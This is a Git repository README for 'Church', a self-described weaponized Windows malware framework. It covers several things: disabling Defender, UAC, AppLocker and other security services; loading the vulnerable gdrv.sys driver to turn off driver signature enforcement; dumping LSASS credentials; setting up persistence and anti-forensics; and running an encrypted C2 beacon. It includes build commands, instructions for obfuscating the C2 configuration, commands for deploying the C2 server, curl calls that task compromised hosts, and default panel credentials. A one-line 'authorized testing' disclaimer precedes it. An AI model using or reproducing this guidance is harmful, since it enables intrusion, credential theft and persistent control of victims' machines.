k3nundrum/CHURCH
1
0
Fork 0
forked from ek0mssavi0r/CHURCH
Code Pull Requests Activity
47d6e8e071
CHURCH/README.md
ek0ms savi0r f6e44b33e9 Upload files to "/"
2026-06-01 03:44:41 +00:00

249 lines
8.3 KiB
Markdown
Raw Blame History

# Church - Weaponized Windows Security Bypass Framework
```
╔═══════════════════════════════════════════════════════════════════════════╗
║ CHURCH OF MALWARE ║
║ Enterprise Offensive Security Framework ║
║ by ek0ms savi0r ║
╚═══════════════════════════════════════════════════════════════════════════╝
```
**Repository:** https://git.churchofmalware.org/ek0mssavi0r/CHURCH/
## DISCLAIMER FOR AUTHORIZED TESTING AND EDUCATIONAL PURPOSES ONLY
---
## Overview
Church is an enterprise-grade Windows security bypass framework that implements multiple advanced techniques to disable or neutralize modern Windows security controls. The framework operates as a cohesive system executing in eight coordinated phases, providing complete offensive capabilities for authorized red team operations.
### Core Capabilities
- **Windows Defender Tamper Protection** via registry ownership takeover
- **Defender real-time protection, behavior monitoring, cloud protection, signature updates**
- **User Account Control (UAC)** via EnableLUA registry modification
- **AppLocker & Windows Defender Application Control (WDAC)** via service disable and policy deletion
- **Driver Signature Enforcement (DSE)** via vulnerable driver exploitation (gdrv.sys CVE-2018-19320)
- **Protected Process Light (PPL)** via SeTcbPrivilege elevation and NtSetInformationProcess
- **Security event logging** via MiniNt registry key
- **System restore points and telemetry domains** via hosts file modification
- **Security services** including Sense, SgrmBroker, WdBoot, WdFilter, WdNisDrv, SecurityHealthService, wscsvc, and 15+ others
- **LSASS credential dumping** with hidden file attributes and shadow copy creation
- **Process hollowing and token stealing** for privilege escalation
- **WMI event subscription** for stealthy persistence
- **IFEO and Silent Process Exit** for automatic payload execution
### Execution Phases
| Phase | Operation | Description |
|-------|-----------|-------------|
| 0 | Telemetry Bypass | ETW and AMSI in-memory patching |
| 1 | Core Protection | Tamper Protection, Defender, UAC, AppLocker, WDAC |
| 2 | Anti-Forensics | Exclusion addition, log disabling, restore point deletion, telemetry blocking |
| 3 | Persistence | Scheduled tasks (x2), WMI events (x2), Run key, BootExecute, Winlogon, IFEO (x2), SilentProcessExit, Service |
| 4 | Service Elimination | Stop and disable 18+ security services |
| 5 | Credential Access | LSASS dump with hidden attribute, VSS shadow copy |
| 6 | Kernel Bypass | gdrv.sys BYOVD, DSE disable |
| 7 | Process Protection | PPL elevation via SeTcbPrivilege |
| 8 | C2 Activation | AES-256 encrypted beacon with jitter, fallback servers |
---
## System Requirements
### Target Environment
- Windows 10 or Windows 11 (any edition)
- Windows Server 2016/2019/2022
- Administrator access required
- Test system or authorized target only
### Build Environment
- Visual Studio 2019 or later with C compiler
- Windows SDK 10.0.18362.0 or later
- Windows 10/11 SDK or later
### Required External File
- `gdrv.sys` (Gigabyte driver, CVE-2018-19320) placed in same directory as the executable
- Download from: https://github.com/Barakat/CVE-2018-19320
---
## Compilation Instructions
### From Visual Studio Developer Command Prompt
```cmd
cl /O2 /MT /Fe:church.exe church.c /link advapi32.lib user32.lib wbemuuid.lib ole32.lib crypt32.lib ntdll.lib bcrypt.lib ws2_32.lib winhttp.lib iphlpapi.lib shlwapi.lib shell32.lib
```
### Compilation Flags for Production
| Flag | Purpose |
|------|---------|
| `/O2` | Optimize for speed |
| `/MT` | Static linking (no runtime DLLs) |
| `/GS-` | Disable stack buffer security check (smaller binary) |
| `/GL` | Whole program optimization |
| `/Os` | Favor code size |
### Stripping Symbols (After Compilation)
```cmd
strip --strip-all church.exe
```
---
## Configuration
Edit `church.c` to configure C2 server settings before compilation:
```c
// C2 Configuration
#define C2_BASE_INTERVAL_SECONDS 60 // Base beacon interval
#define C2_JITTER_MAX_SECONDS 120 // Random jitter added
// Obfuscated strings (XOR key 0xDD)
CHAR g_c2_server_obf[] = "\x78\x9D\x9D..." // https://your-c2-server.com/beacon
CHAR g_aes_key_obf[] = "\xAB\xAA\xA8..." // 32-byte AES-256 key
CHAR g_aes_iv_obf[] = "\xB1\xB8\xB7..." // 16-byte AES IV
```
Replace the obfuscated strings with your own XOR-encrypted values using the provided key (0xDD). The C2 server expects matching AES keys.
---
## C2 Server Deployment
### Full APT-Grade C2 Server
```bash
# Install dependencies
pip install flask flask-socketio cryptography werkzeug
# Generate SSL certificate (for HTTPS)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# Run the C2 server
python church_c2_server.py --host 0.0.0.0 --port 443
# Or with HTTP for testing
python church_c2_server.py --host 0.0.0.0 --port 8080 --http
```
### C2 Server Features
| Feature | Description |
|---------|-------------|
| **AES-256-CBC Encryption** | All beacon traffic encrypted end-to-end |
| **SQLite Database** | Persistent storage of beacons, tasks, results, credentials |
| **WebSocket Real-time** | Live updates to web UI |
| **Web UI Dashboard** | Modern terminal-style command interface |
| **REST API** | Full programmatic control with JWT authentication |
| **Task Queue** | Command queuing with output capture |
| **Multi-session** | Handle hundreds of beacons simultaneously |
| **Audit Logging** | Complete action history with timestamps |
| **Beacon Management** | Track last seen, status, metadata, tags |
| **Command Presets** | Quick common commands library |
| **Stale Cleanup** | Auto-remove dead beacons after timeout |
| **Credential Harvesting** | Store and categorize stolen credentials |
### C2 API Endpoints
```bash
# List all beacons
curl -H "X-Auth-Token: <JWT_SECRET>" https://localhost/api/beacons
# Execute command on beacon
curl -X POST -H "X-Auth-Token: <JWT_SECRET>" \
-H "Content-Type: application/json" \
-d '{"host": "beacon_id", "command": "whoami"}' \
https://localhost/api/task
# Execute PowerShell command
curl -X POST -H "X-Auth-Token: <JWT_SECRET>" \
-H "Content-Type: application/json" \
-d '{"host": "beacon_id", "command": "Get-Process", "powershell": true}' \
https://localhost/api/task
# Get beacon details
curl -H "X-Auth-Token: <JWT_SECRET>" \
https://localhost/api/beacon/<beacon_id>
# Get task history
curl -H "X-Auth-Token: <JWT_SECRET>" \
https://localhost/api/tasks/<beacon_id>
# Get system statistics
curl -H "X-Auth-Token: <JWT_SECRET>" \
https://localhost/api/stats
```
### Web UI Access
Navigate to `https://c2-server:443` and log in with:
- **Username:** `admin`
- **Password:** `CHURCHadmin2024!!`
---
## Execution
Run the compiled executable as Administrator:
```cmd
church.exe
```
The tool auto-elevates if not already running with administrative privileges. The console provides real-time feedback on each phase:
```
[***] CHURCH OF MALWARE - FULL WEAPONIZED BYPASS [***]
=== PHASE 1: CORE PROTECTIONS ===
[+] Tamper Protection disabled
[+] WinDefend disabled
[+] Terminated MsMpEng.exe
[+] UAC disabled (reboot required)
[+] AppIDSvc disabled
=== PHASE 2: ANTI-FORENSICS ===
[+] Defender exclusions added
[+] Security logs disabled (MiniNt)
[+] System Restore disabled
[+] Telemetry blocked
=== PHASE 3: PERSISTENCE ===
[+] Scheduled task added
[+] IFEO persistence set
[+] BootExecute persistence added
[+] WMI persistence added
=== PHASE 4: SERVICE ELIMINATION ===
[+] Disabled Sense, SgrmBroker, WdBoot, WdFilter, WdNisDrv...
=== PHASE 5: CREDENTIAL ACCESS ===
[+] LSASS dumped to C:\lsass.dmp
=== PHASE 6: KERNEL BYPASS ===
[+] gdrv.sys loaded
[+] DSE disabled via gdrv
=== PHASE 7: PROCESS PROTECTION ===
[+] Process is now PPL
=== PHASE 8: C2 ACTIVATION ===
[+] C2 beacon active (interval: 60-180 sec)
[+] ALL PHASES COMPLETE
[!] REBOOT REQUIRED
```
After completion, the system reboots automatically.
---
x0 ek0ms
View Git Blame Copy Permalink